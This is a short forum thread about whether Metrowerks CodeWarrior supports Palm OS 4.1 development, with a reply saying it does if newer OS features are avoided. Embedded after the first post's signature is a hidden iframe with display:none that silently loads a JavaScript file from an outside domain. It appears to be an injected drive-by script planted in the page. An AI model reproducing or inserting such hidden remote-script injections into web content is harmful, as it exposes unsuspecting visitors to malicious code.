+ Reply to Thread
Results 1 to 2 of 2
  1. #1
    Registered User
    Join Date
    12-20-2002
    Posts
    33

    Development for the 7135?

    Hey all,
    I was wondering from all the other software engineers out there if the latest version of Codewarrior ALSO supports OS 4.1 or if its JUST an OS 5 version. It was unclear from the Metrowerks site.
    Thx!
    Brian<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Fully Converged rlwhitt's Avatar
    Join Date
    11-05-2002
    Posts
    821

    Re: Development for the 7135?

    Yes, it would support any OS version. In fact, all you'd really have to do is be sure you don't use any OS feature specific to a version after 4.1 Or a more drastic measure would be to just replace the Palm OS SDK (includes, etc) that comes with CW with whichever one you want to be SURE you don't use something that is a no-no.

    Originally posted by briansin
    Hey all,
    I was wondering from all the other software engineers out there if the latest version of Codewarrior ALSO supports OS 4.1 or if its JUST an OS 5 version. It was unclear from the Metrowerks site.
    Thx!
    Brian

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts